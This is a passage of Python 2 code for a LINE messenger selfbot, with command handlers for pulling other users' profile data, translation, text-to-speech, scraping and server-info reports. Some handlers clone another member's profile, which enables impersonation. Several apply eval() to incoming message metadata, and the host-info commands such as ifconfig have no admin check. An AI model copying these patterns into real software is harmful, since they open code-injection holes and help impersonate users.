cl.sendImageWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus) elif msg.text in ["Myvid"]: h = cl.getContact(mid) cl.sendVideoWithURL(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus) elif msg.text in ["Urlpict"]: h = cl.getContact(mid) cl.sendText(msg.to,"http://dl.profile.line-cdn.net/" + h.pictureStatus) elif msg.text in ["Mycover"]: h = cl.getContact(mid) cu = cl.channel.getCover(mid) path = str(cu) cl.sendImageWithURL(msg.to, path) elif msg.text in ["Urlcover"]: h = cl.getContact(mid) cu = cl.channel.getCover(mid) path = str(cu) cl.sendText(msg.to, path) elif "Getmid @" in msg.text: _name = msg.text.replace("Getmid @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) for g in gs.members: if _nametarget == g.displayName: cl.sendText(msg.to, g.mid) else: pass elif "Getinfo" in msg.text: key = eval(msg.contentMetadata["MENTION"]) key1 = key["MENTIONEES"][0]["M"] contact = cl.getContact(key1) cu = cl.channel.getCover(key1) try: cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\nhttp://dl.profile.line-cdn.net/" + contact.pictureStatus + "\n\nHeader :\n" + str(cu)) except: cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nMid :\n" + contact.mid + "\n\nBio :\n" + contact.statusMessage + "\n\nProfile Picture :\n" + str(cu)) elif "Getbio" in msg.text: key = eval(msg.contentMetadata["MENTION"]) key1 = key["MENTIONEES"][0]["M"] contact = cl.getContact(key1) cu = cl.channel.getCover(key1) try: cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage) except: cl.sendText(msg.to, "===[StatusMessage]===\n" + contact.statusMessage) elif "Getname" in msg.text: key = eval(msg.contentMetadata["MENTION"]) key1 = key["MENTIONEES"][0]["M"] contact = cl.getContact(key1) cu = cl.channel.getCover(key1) try: cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName) except: cl.sendText(msg.to, "===[DisplayName]===\n" + contact.displayName) elif "Getprofile" in msg.text: key = eval(msg.contentMetadata["MENTION"]) key1 = key["MENTIONEES"][0]["M"] contact = cl.getContact(key1) cu = cl.channel.getCover(key1) path = str(cu) image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus try: cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage) cl.sendText(msg.to,"Profile Picture " + contact.displayName) cl.sendImageWithURL(msg.to,image) cl.sendText(msg.to,"Cover " + contact.displayName) cl.sendImageWithURL(msg.to,path) except: pass elif "Getcontact" in msg.text: key = eval(msg.contentMetadata["MENTION"]) key1 = key["MENTIONEES"][0]["M"] mmid = cl.getContact(key1) msg.contentType = 13 msg.contentMetadata = {"mid": key1} cl.sendMessage(msg) elif "Getpict @" in msg.text: print "[Command]dp executing" _name = msg.text.replace("Getpict @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Contact not found") else: for target in targets: try: contact = cl.getContact(target) path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus cl.sendImageWithURL(msg.to, path) except Exception as e: raise e print "[Command]dp executed" elif "Getvid @" in msg.text: print "[Command]dp executing" _name = msg.text.replace("Getvid @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Contact not found") else: for target in targets: try: contact = cl.getContact(target) path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus cl.sendVideoWithURL(msg.to, path) except Exception as e: raise e print "[Command]dp executed" elif "Picturl @" in msg.text: print "[Command]dp executing" _name = msg.text.replace("Picturl @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Contact not found") else: for target in targets: try: contact = cl.getContact(target) path = "http://dl.profile.line-cdn.net/" + contact.pictureStatus cl.sendText(msg.to, path) except Exception as e: raise e print "[Command]dp executed" elif "Getcover @" in msg.text: print "[Command]cover executing" _name = msg.text.replace("Getcover @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Contact not found") else: for target in targets: try: contact = cl.getContact(target) cu = cl.channel.getCover(target) path = str(cu) cl.sendImageWithURL(msg.to, path) except Exception as e: raise e print "[Command]cover executed" elif "Coverurl @" in msg.text: print "[Command]cover executing" _name = msg.text.replace("Coverurl @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to,"Contact not found") else: for target in targets: try: contact = cl.getContact(target) cu = cl.channel.getCover(target) path = str(cu) cl.sendText(msg.to, path) except Exception as e: raise e print "[Command]cover executed" elif "Getgrup image" in msg.text: group = cl.getGroup(msg.to) path = "http://dl.profile.line-cdn.net/" + group.pictureStatus cl.sendImageWithURL(msg.to,path) elif "Urlgrup image" in msg.text: group = cl.getGroup(msg.to) path = "http://dl.profile.line-cdn.net/" + group.pictureStatus cl.sendText(msg.to,path) elif "Mycopy @" in msg.text: print "[COPY] Ok" _name = msg.text.replace("Mycopy @","") _nametarget = _name.rstrip(' ') gs = cl.getGroup(msg.to) targets = [] for g in gs.members: if _nametarget == g.displayName: targets.append(g.mid) if targets == []: cl.sendText(msg.to, "Not Found...") else: for target in targets: try: cl.CloneContactProfile(target) cl.sendText(msg.to, "Copied.") except Exception as e: print e elif msg.text in ["Mybackup","mybackup"]: try: cl.updateDisplayPicture(backup.pictureStatus) cl.updateProfile(backup) cl.sendText(msg.to, "Refreshed.") except Exception as e: cl.sendText(msg.to, str(e)) #==============================================================================# elif "Fancytext: " in msg.text: txt = msg.text.replace("Fancytext: ", "") cl.kedapkedip(msg.to,txt) print "[Command] Kedapkedip" elif "Translate-id " in msg.text: isi = msg.text.replace("Tr-id ","") translator = Translator() hasil = translator.translate(isi, dest='id') A = hasil.text A = A.encode('utf-8') cl.sendText(msg.to, A) elif "Translate-en " in msg.text: isi = msg.text.replace("Tr-en ","") translator = Translator() hasil = translator.translate(isi, dest='en') A = hasil.text A = A.encode('utf-8') cl.sendText(msg.to, A) elif "Translate-ar" in msg.text: isi = msg.text.replace("Tr-ar ","") translator = Translator() hasil = translator.translate(isi, dest='ar') A = hasil.text A = A.encode('utf-8') cl.sendText(msg.to, A) elif "Translate-jp" in msg.text: isi = msg.text.replace("Tr-jp ","") translator = Translator() hasil = translator.translate(isi, dest='ja') A = hasil.text A = A.encode('utf-8') cl.sendText(msg.to, A) elif "Translate-ko" in msg.text: isi = msg.text.replace("Tr-ko ","") translator = Translator() hasil = translator.translate(isi, dest='ko') A = hasil.text A = A.encode('utf-8') cl.sendText(msg.to, A) elif "Id@en" in msg.text: bahasa_awal = 'id' bahasa_tujuan = 'en' kata = msg.text.replace("Id@en ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"**FROM ID**\n" + "" + kata + "\n**TO ENGLISH**\n" + "" + result + "\n**SUKSES**") elif "En@id" in msg.text: bahasa_awal = 'en' bahasa_tujuan = 'id' kata = msg.text.replace("En@id ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"**FROM EN**\n" + "" + kata + "\n**TO ID**\n" + "" + result + "\n**SUKSES**") elif "Id@jp" in msg.text: bahasa_awal = 'id' bahasa_tujuan = 'ja' kata = msg.text.replace("Id@jp ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"**FROM ID**\n" + "" + kata + "\n**TO JP**\n" + "" + result + "\n**SUKSES**") elif "Jp@id" in msg.text: bahasa_awal = 'ja' bahasa_tujuan = 'id' kata = msg.text.replace("Jp@id ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM JP----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----") elif "Id@th" in msg.text: bahasa_awal = 'id' bahasa_tujuan = 'th' kata = msg.text.replace("Id@th ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO TH----\n" + "" + result + "\n------SUKSES-----") elif "Th@id" in msg.text: bahasa_awal = 'th' bahasa_tujuan = 'id' kata = msg.text.replace("Th@id ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM TH----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----") elif "Id@jp" in msg.text: bahasa_awal = 'id' bahasa_tujuan = 'ja' kata = msg.text.replace("Id@jp ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO JP----\n" + "" + result + "\n------SUKSES-----") elif "Id@ar" in msg.text: bahasa_awal = 'id' bahasa_tujuan = 'ar' kata = msg.text.replace("Id@ar ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO AR----\n" + "" + result + "\n------SUKSES-----") elif "Ar@id" in msg.text: bahasa_awal = 'ar' bahasa_tujuan = 'id' kata = msg.text.replace("Ar@id ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM AR----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----") elif "Id@ko" in msg.text: bahasa_awal = 'id' bahasa_tujuan = 'ko' kata = msg.text.replace("Id@ko ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM ID----\n" + "" + kata + "\n----TO KO----\n" + "" + result + "\n------SUKSES-----") elif "Ko@id" in msg.text: bahasa_awal = 'ko' bahasa_tujuan = 'id' kata = msg.text.replace("Ko@id ","") url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+")) agent = {'User-Agent':'Mozilla/5.0'} cari_hasil = 'class="t0">' request = urllib2.Request(url, headers=agent) page = urllib2.urlopen(request).read() result = page[page.find(cari_hasil)+len(cari_hasil):] result = result.split("<")[0] cl.sendText(msg.to,"----FROM KO----\n" + "" + kata + "\n----TO ID----\n" + "" + result + "\n------SUKSES-----") elif msg.text.lower() == 'welcome': ginfo = cl.getGroup(msg.to) cl.sendText(msg.to,"Selamat Datang Di Grup " + str(ginfo.name)) jawaban1 = ("Selamat Datang Di Grup " + str(ginfo.name)) cl.sendText(msg.to,"Owner Grup " + str(ginfo.name) + " :\n" + ginfo.creator.displayName ) tts = gTTS(text=jawaban1, lang='id') tts.save('tts.mp3') cl.sendAudio(msg.to,'tts.mp3') elif "Say-id " in msg.text: say = msg.text.replace("Say-id ","") lang = 'id' tts = gTTS(text=say, lang=lang) tts.save("hasil.mp3") cl.sendAudio(msg.to,"hasil.mp3") elif "Say-en " in msg.text: say = msg.text.replace("Say-en ","") lang = 'en' tts = gTTS(text=say, lang=lang) tts.save("hasil.mp3") cl.sendAudio(msg.to,"hasil.mp3") elif "Say-jp " in msg.text: say = msg.text.replace("Say-jp ","") lang = 'ja' tts = gTTS(text=say, lang=lang) tts.save("hasil.mp3") cl.sendAudio(msg.to,"hasil.mp3") elif "Say-ar " in msg.text: say = msg.text.replace("Say-ar ","") lang = 'ar' tts = gTTS(text=say, lang=lang) tts.save("hasil.mp3") cl.sendAudio(msg.to,"hasil.mp3") elif "Say-ko " in msg.text: say = msg.text.replace("Say-ko ","") lang = 'ko' tts = gTTS(text=say, lang=lang) tts.save("hasil.mp3") cl.sendAudio(msg.to,"hasil.mp3") elif "Kapan " in msg.text: tanya = msg.text.replace("Kapan ","") jawab = ("kapan kapan","besok","satu abad lagi","Hari ini","Tahun depan","Minggu depan","Bulan depan","Sebentar lagi") jawaban = random.choice(jawab) tts = gTTS(text=jawaban, lang='id') tts.save('tts.mp3') cl.sendAudio(msg.to,'tts.mp3') elif "Apakah " in msg.text: tanya = msg.text.replace("Apakah ","") jawab = ("Ya","Tidak","Mungkin","Bisa jadi") jawaban = random.choice(jawab) tts = gTTS(text=jawaban, lang='id') tts.save('tts.mp3') cl.sendAudio(msg.to,'tts.mp3') elif 'Youtubemp4 ' in msg.text: try: textToSearch = (msg.text).replace('Youtubemp4 ', "").strip() query = urllib.quote(textToSearch) url = "https://www.youtube.com/results?search_query=" + query response = urllib2.urlopen(url) html = response.read() soup = BeautifulSoup(html, "html.parser") results = soup.find(attrs={'class': 'yt-uix-tile-link'}) ght = ('https://www.youtube.com' + results['href']) cl.sendVideoWithURL(msg.to, ght) except: cl.sendText(msg.to, "Could not find it") elif "ytsearch " in msg.text: query = msg.text.replace("ytsearch ","") with requests.session() as s: s.headers['user-agent'] = 'Mozilla/5.0' url = 'http://www.youtube.com/results' params = {'search_query': query} r = s.get(url, params=params) soup = BeautifulSoup(r.content, 'html5lib') hasil = "" for a in soup.select('.yt-lockup-title > a[title]'): if '&list=' not in a['href']: hasil += ''.join((a['title'],'\nUrl : http://www.youtube.com' + a['href'],'\n\n')) cl.sendText(msg.to,hasil) print '[Command] Youtube Search' elif "Lirik " in msg.text: try: songname = msg.text.lower().replace("Lirik ","") params = {'songname': songname} r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params)) data = r.text data = json.loads(data) for song in data: hasil = 'Lyric Lagu (' hasil += song[0] hasil += ')\n\n' hasil += song[5] cl.sendText(msg.to, hasil) except Exception as wak: cl.sendText(msg.to, str(wak)) elif "Wikipedia " in msg.text: try: wiki = msg.text.lower().replace("Wikipedia ","") wikipedia.set_lang("id") pesan="Title (" pesan+=wikipedia.page(wiki).title pesan+=")\n\n" pesan+=wikipedia.summary(wiki, sentences=1) pesan+="\n" pesan+=wikipedia.page(wiki).url cl.sendText(msg.to, pesan) except: try: pesan="Over Text Limit! Please Click link\n" pesan+=wikipedia.page(wiki).url cl.sendText(msg.to, pesan) except Exception as e: cl.sendText(msg.to, str(e)) elif "Music " in msg.text: try: songname = msg.text.lower().replace("Music ","") params = {'songname': songname} r = requests.get('http://ide.fdlrcn.com/workspace/yumi-apis/joox?' + urllib.urlencode(params)) data = r.text data = json.loads(data) for song in data: hasil = 'This is Your Music\n' hasil += 'Judul : ' + song[0] hasil += '\nDurasi : ' + song[1] hasil += '\nLink Download : ' + song[4] cl.sendText(msg.to, hasil) cl.sendText(msg.to, "Please Wait for audio...") cl.sendAudioWithURL(msg.to, song[4]) except Exception as njer: cl.sendText(msg.to, str(njer)) elif "Image " in msg.text: search = msg.text.replace("Image ","") url = 'https://www.google.com/search?espv=2&biw=1366&bih=667&tbm=isch&oq=kuc&aqs=mobile-gws-lite.0.0l5&q=' + search raw_html = (download_page(url)) items = [] items = items + (_images_get_all_items(raw_html)) path = random.choice(items) print path try: cl.sendImageWithURL(msg.to,path) except: pass elif "Profileig " in msg.text: try: instagram = msg.text.replace("Profileig ","") response = requests.get("https://www.instagram.com/"+instagram+"?__a=1") data = response.json() namaIG = str(data['user']['full_name']) bioIG = str(data['user']['biography']) mediaIG = str(data['user']['media']['count']) verifIG = str(data['user']['is_verified']) usernameIG = str(data['user']['username']) followerIG = str(data['user']['followed_by']['count']) profileIG = data['user']['profile_pic_url_hd'] privateIG = str(data['user']['is_private']) followIG = str(data['user']['follows']['count']) link = "LinkNya: " + "https://www.instagram.com/" + instagram text = "Name : "+namaIG+"\nUsername : "+usernameIG+"\nBiography : "+bioIG+"\nFollowerNya : "+followerIG+"\nFollowingNya : "+followIG+"\nPost : "+mediaIG+"\nVerified : "+verifIG+"\nPrivate : "+privateIG+"" "\n" + link cl.sendText(msg.to, str(text)) except Exception as e: cl.sendText(msg.to, str(e)) elif 'instagram ' in msg.text.lower(): try: instagram = msg.text.lower().replace("instagram ","") html = requests.get('https://www.instagram.com/' + instagram + '/?') soup = BeautifulSoup(html.text, 'html5lib') data = soup.find_all('meta', attrs={'property':'og:description'}) text = data[0].get('content').split() data1 = soup.find_all('meta', attrs={'property':'og:image'}) text1 = data1[0].get('content').split() user = "Name: " + text[-2] + "\n" user1 = "Username: " + text[-1] + "\n" followers = "Followers: " + text[0] + "\n" following = "Following: " + text[2] + "\n" post = "Post: " + text[4] + "\n" link = "Link: " + "https://www.instagram.com/" + instagram detail = "********************\n" details = "\n********************=" cl.sendText(msg.to, detail + user + user1 + followers + following + post + link + details) cl.sendImageWithURL(msg.to, text1[0]) except Exception as njer: cl.sendText(msg.to, str(njer)) elif "Checkdate " in msg.text: tanggal = msg.text.replace("Checkdate ","") r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal) data=r.text data=json.loads(data) lahir = data["data"]["lahir"] usia = data["data"]["usia"] ultah = data["data"]["ultah"] zodiak = data["data"]["zodiak"] cl.sendText(msg.to,"============ I N F O R M A S I ============\n"+"Date Of Birth : "+lahir+"\nAge : "+usia+"\nUltah : "+ultah+"\nZodiak : "+zodiak+"\n============ I N F O R M A S I ============") elif "Zodiak " in msg.text: tanggal = msg.text.replace("Zodiak ","") r=requests.get('https://script.google.com/ macros/exec?service=AKfycbw7gKzP-WYV 2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal) data=r.text data=json.loads(data) lahir = data["data"]["lahir"] usia = data["data"]["usia"] ultah = data["data"]["ultah"] zodiak = data["data"]["zodiak"] cl.sendText(msg.to,"Tanggal Lahir: "+lahir+"\n\nUsia:"+usia+"\n\nUltah: "+ultah+"\n\nZodiak: "+zodiak) elif msg.text in ["Kalender","Time","Waktu"]: timeNow = datetime.now() timeHours = datetime.strftime(timeNow,"(%H:%M)") day = ["Sunday", "Monday", "Tuesday", "Wednesday", "Thursday","Friday", "Saturday"] hari = ["Minggu", "Senin", "Selasa", "Rabu", "Kamis", "Jumat", "Sabtu"] bulan = ["Januari", "Februari", "Maret", "April", "Mei", "Juni", "Juli", "Agustus", "September", "Oktober", "November", "Desember"] inihari = datetime.today() hr = inihari.strftime('%A') bln = inihari.strftime('%m') for i in range(len(day)): if hr == day[i]: hasil = hari[i] for k in range(0, len(bulan)): if bln == str(k): blan = bulan[k-1] rst = hasil + ", " + inihari.strftime('%d') + " - " + blan + " - " + inihari.strftime('%Y') + "\nJam : [ " + inihari.strftime('%H:%M:%S') + " ]" cl.sendText(msg.to, rst) #==============================================================================# elif msg.text.lower() == 'ifconfig': botKernel = subprocess.Popen(["ifconfig"], stdout=subprocess.PIPE).communicate()[0] cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO NetStat===") elif msg.text.lower() == 'system': botKernel = subprocess.Popen(["df","-h"], stdout=subprocess.PIPE).communicate()[0] cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO SYSTEM===") elif msg.text.lower() == 'kernel': botKernel = subprocess.Popen(["uname","-srvmpio"], stdout=subprocess.PIPE).communicate()[0] cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO KERNEL===") elif msg.text.lower() == 'cpu': botKernel = subprocess.Popen(["cat","/proc/cpuinfo"], stdout=subprocess.PIPE).communicate()[0] cl.sendText(msg.to, botKernel + "\n\n===SERVER INFO CPU===") elif "Restart" in msg.text: print "[Command]Restart" try: cl.sendText(msg.to,"Restarting...") cl.sendText(msg.to,"Restart Success") restart_program() except: cl.sendText(msg.to,"Please wait") restart_program() pass elif "Turn off" in msg.text: try: import sys sys.exit() except: pass elif msg.text.lower() == 'runtime': eltime = time.time() - mulai van = "Bot has been active "+waktu(eltime) cl.sendText(msg.to,van) #================================ PUY SCRIPT STARTED ==============================================# elif "google " in msg.text: a = msg.text.replace("google ","") b = urllib.quote(a) cl.sendText(msg.to,"Sedang Mencari om...") cl.sendText(msg.to, "https://www.google.com/" + b) cl.sendText(msg.to,"Ketemu om ^") elif cms(msg.text,["/creator","Creator"]): msg.contentType = 13 msg.contentMetadata = {'mid': "ub14f769cdf42d8c8a618ebe91ac2c8c7"} cl.sendMessage(msg) #elif msg.text in ["puy"]: #cl.sendText(msg.to,"Puy here") # cl.sendText(msg.to,"Puy here") # kk.sendText(msg.to,"Puy here") # cl.sendText(msg.to,"Hadir semua puy!") elif msg.text in ["Masuk","...","Join kuy"]: #Panggil Semua Bot if msg.from_ in admin: G = cl.getGroup(msg.to) ginfo = cl.getGroup(msg.to) G.preventJoinByTicket = False cl.updateGroup(G) invsend = 0 Ticket = cl.reissueGroupTicket(msg.to) ki.acceptGroupInvitationByTicket(msg.to,Ticket) time.sleep(0.01) kk.acceptGroupInvitationByTicket(msg.to,Ticket) time.sleep(0.01) G = cl.getGroup(msg.to) ginfo = cl.getGroup(msg.to) G.preventJoinByTicket = True cl.updateGroup(G) print "Semua Sudah Lengkap" elif msg.text in ["Puy join"]: if msg.from_ in admin: x = ki.getGroup(msg.to) x.preventJoinByTicket = False ki.updateGroup(x) invsend = 0 Ti = ki.reissueGroupTicket(msg.to) cl.acceptGroupInvitationByTicket(msg.to,Ti) G = ki.getGroup(msg.to) G.preventJoinByTicket = True ki.updateGroup(G) Ticket = ki.reissueGroupTicket(msg.to) elif "Clone " in msg.text: copy0 = msg.text.replace("Clone ","") copy1 = copy0.lstrip() copy2 = copy1.replace("@","") copy3 = copy2.rstrip() _name = copy3 group = cl.getGroup(msg.to) for contact in group.members: cname = cl.getContact(contact.mid).displayName if cname == _name: cl.CloneContactProfile(contact.mid) cl.sendText(msg.to, "Berhasil puy") else: pass elif "friendpp: " in msg.text: if msg.from_ in admin: suf = msg.text.replace('friendpp: ','') gid = cl.getAllContactIds() for i in gid: h = cl.getContact(i).displayName gna = cl.getContact(i) if h == suf: cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus) elif "Checkmid: " in msg.text: saya = msg.text.replace("Checkmid: ","") msg.contentType = 13 msg.contentMetadata = {"mid":saya} cl.sendMessage(msg) contact = cl.getContact(saya) cu = cl.channel.getCover(saya) path = str(cu) image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus try: cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage) cl.sendText(msg.to,"Profile Picture " + contact.displayName) cl.sendImageWithURL(msg.to,image) cl.sendText(msg.to,"Cover " + contact.displayName) cl.sendImageWithURL(msg.to,path) except: pass elif "Checkid: " in msg.text: saya = msg.text.replace("Checkid: ","") gid = cl.getGroupIdsJoined() for i in gid: h = cl.getGroup(i).id group = cl.getGroup(i) if h == saya: try: creator = group.creator.mid msg.contentType = 13 msg.contentMetadata = {'mid': creator} md = "Nama Grup :\n" + group.name + "\n\nID Grup :\n" + group.id if group.preventJoinByTicket is False: md += "\n\nKode Url : Diizinkan" else: md += "\n\nKode Url : Diblokir" if group.invitee is None: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : 0 Orang" else: md += "\nJumlah Member : " + str(len(group.members)) + " Orang" + "\nUndangan Yang Belum Diterima : " + str(len(group.invitee)) + " Orang" cl.sendText(msg.to,md) cl.sendMessage(msg) cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ group.pictureStatus) except: creator = "Error" elif msg.text in ["Friendlist"]: contactlist = cl.getAllContactIds() kontak = cl.getContacts(contactlist) num=1 msgs="═════════List Friend═════════" for ids in kontak: msgs+="\n[%i] %s" % (num, ids.displayName) num=(num+1) msgs+="\n═════════List Friend═════════\n\nTotal Friend : %i" % len(kontak) cl.sendText(msg.to, msgs) elif msg.text in ["Memlist"]: kontak = cl.getGroup(msg.to) group = kontak.members num=1 msgs="═════════List Member═════════-" for ids in group: msgs+="\n[%i] %s" % (num, ids.displayName) num=(num+1) msgs+="\n═════════List Member═════════\n\nTotal Members : %i" % len(group) cl.sendText(msg.to, msgs) elif "Friendinfo: " in msg.text: saya = msg.text.replace('Friendinfo: ','') gid = cl.getAllContactIds() for i in gid: h = cl.getContact(i).displayName contact = cl.getContact(i) cu = cl.channel.getCover(i) path = str(cu) image = "http://dl.profile.line-cdn.net/" + contact.pictureStatus if h == saya: cl.sendText(msg.to,"Nama :\n" + contact.displayName + "\n\nBio :\n" + contact.statusMessage) cl.sendText(msg.to,"Profile Picture " + contact.displayName) cl.sendImageWithURL(msg.to,image) cl.sendText(msg.to,"Cover " + contact.displayName) cl.sendImageWithURL(msg.to,path) elif "Friendpict: " in msg.text: saya = msg.text.replace('Friendpict: ','') gid = cl.getAllContactIds() for i in gid: h = cl.getContact(i).displayName gna = cl.getContact(i) if h == saya: cl.sendImageWithURL(msg.to,"http://dl.profile.line.naver.jp/"+ gna.pictureStatus) elif msg.text in ["Friendlistmid"]: gruplist = cl.getAllContactIds() kontak = cl.getContacts(gruplist) num=1 msgs="═════════ʆίςϯ ƒɾίεηδʍίδ═════════" for ids in kontak: msgs+="\n[%i] %s" % (num, ids.mid) num=(num+1) msgs+="\n═════════ʆίςϯ ƒɾίεηδʍίδ═════════\n\nTotal Friend : %i" % len(kontak) cl.sendText(msg.to, msgs) elif msg.text in ["Blocklist"]: blockedlist = cl.getBlockedContactIds() kontak = cl.getContacts(blockedlist) num=1 msgs="═════════List Blocked═════════" for ids in kontak: msgs+="\n[%i] %s" % (num, ids.displayName) num=(num+1) msgs+="\n═════════List Blocked═════════\n\nTotal Blocked : %i" % len(kontak) cl.sendText(msg.to, msgs) elif msg.text in ["Gruplist"]: gruplist = cl.getGroupIdsJoined() kontak = cl.getGroups(gruplist) num=1 msgs="═════════List Grup═════════" for ids in kontak: msgs+="\n[%i] %s" % (num, ids.name) num=(num+1) msgs+="\n═════════List Grup═════════\n\nTotal Grup : %i" % len(kontak) cl.sendText(msg.to, msgs) elif msg.text in ["Gruplistmid"]: gruplist = cl.getGroupIdsJoined() kontak = cl.getGroups(gruplist) num=1 msgs="═════════List GrupMid═════════" for ids in kontak: msgs+="\n[%i] %s" % (num, ids.id) num=(num+1) msgs+="\n═════════List GrupMid═════════\n\nTotal Grup : %i" % len(kontak) cl.sendText(msg.to, msgs) elif "Grupimage: " in msg.text: saya = msg.text.replace('Grupimage: ','') gid = cl.getGroupIdsJoined() for i in gid: h = cl.getGroup(i).name gna = 